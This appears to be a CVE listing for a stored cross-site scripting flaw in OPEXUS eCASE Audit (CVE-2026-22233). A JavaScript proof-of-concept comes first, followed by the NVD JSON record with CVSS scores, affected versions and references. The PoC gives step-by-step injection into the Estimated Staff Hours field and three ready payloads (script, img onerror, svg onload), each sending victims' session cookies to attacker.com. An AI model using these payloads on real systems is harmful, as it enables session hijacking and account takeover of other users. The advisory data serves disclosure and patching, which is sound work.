CVE-2026-22233

// CVE-2026-22233 PoC - Stored XSS in OPEXUS eCASE Audit // Affected Field: Estimated Staff Hours // Trigger: When other users visit Project Cost tab // Step 1: Login to OPEXUS eCASE Audit with low-privilege account const loginPayload = { username: 'attacker_account', password: 'password123' }; // Step 2: Navigate to the form with Estimated Staff Hours field // This typically involves accessing a project/cost entry form // Step 3: Inject XSS payload in Estimated Staff Hours field const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Alternative payload examples: // <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> // <svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)> // Step 4: Save the form - payload is stored in database const savePayload = { estimatedStaffHours: xssPayload, // other form fields... }; // Step 5: When victim visits Project Cost tab, XSS executes automatically // Attacker receives victim's session cookie at their server

{"cve": {"id": "CVE-2026-22233", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-01-08T18:16:00.220", "lastModified": "2026-02-05T19:23:24.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment in the \"Estimated Staff Hours\" field. The JavaScript is executed whenever another user visits the Project Cost tab. Fixed in OPEXUS eCASE Audit 11.14.2.0."}, {"lang": "es", "value": "OPEXUS eCASE Audit permite a un atacante autenticado guardar JavaScript como un comentario en el campo 'Horas de personal estimadas'. El JavaScript se ejecuta cada vez que otro usuario visita la pestaña 'Costo del proyecto'. Corregido en OPEXUS eCASE Audit 11.14.2.0."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:ecase_audit:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.14.2.0", "matchCriteriaId": "5A4D2029-9D59-4E65-B116-7405E4D37F4F"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/oig/audit/eCase_Audit_Release_Notes_11.14.2.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Broken Link"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-22233", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}